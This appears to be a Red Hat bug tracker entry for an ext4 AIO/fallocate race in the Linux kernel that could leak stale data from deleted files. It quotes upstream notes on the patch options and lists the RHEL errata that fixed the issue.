A race condition flaw has been found in the way asynchronous I/O and fallocate interacted which can lead to exposure of stale data -- that is, an extent which should have had the "uninitialized" bit set indicating that its blocks have not yet been written and thus contain data from a deleted file. An unprivileged local user could use this flaw to cause an information leak. Acknowledgements: Red Hat would like to thank Theodore Ts'o for reporting this issue. Upstream acknowledges Dmitry Monakhov as the original reporter. References: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=dee1f973ca341c266229faa5a1a5bb268bed3531
Created attachment 633181 [details] Upstream patches Theodore Ts'o writes: "There are two ways of patching this bug. One is to apply the entire set of AIO/DIO race fixes, which will fix a number of other bugs (some of which can cause the system to deadlock if the right stress tester is run). All but the last two patches in the enclosed tar file are in the ext4.git tree and will shortly be pushed to Linus. The last two will fix stale data exposure bug. A simpler fix is to simply apply the last patch in this patch series. This should work on all older kernels; the downside of applying just the last patch is that there is a slight risk of data loss if the file system is full at the point where we have the AIO/fallocate race, *AND* the leaf node in extent tree is full, requiring a block allocation in order to split an extent so we can mark part of the extent as being uninitialized. This is a very hard-to-hit corner case, so it should be OK to just apply the last patch in this series. Applying the entire patch series will allow us to significantly reduce the chances of this corner case happening. The enclosed tar file has these patches ported to the 3.6 kernel; it should not be hard to make them apply for older kernels as necessary." The last patch is also referenced in comment#0.
Created kernel tracking bugs for this issue Affects: fedora-all [bug 869909]
This issue has been addressed in following products: MRG for RHEL-6 v.2 Via RHSA-2012:1491 https://rhn.redhat.com/errata/RHSA-2012-1491.html
This issue has been addressed in following products: Red Hat Enterprise Linux 5 Via RHSA-2012:1540 https://rhn.redhat.com/errata/RHSA-2012-1540.html
This issue has been addressed in following products: Red Hat Enterprise Linux 6 Via RHSA-2013:0496 https://rhn.redhat.com/errata/RHSA-2013-0496.html
This issue has been addressed in following products: Red Hat Enterprise Linux 6.2 EUS - Server and Compute Node Only Via RHSA-2013:1519 https://rhn.redhat.com/errata/RHSA-2013-1519.html
This issue has been addressed in following products: Red Hat Enterprise Linux 6.3 EUS - Server and Compute Node Only Via RHSA-2013:1783 https://rhn.redhat.com/errata/RHSA-2013-1783.html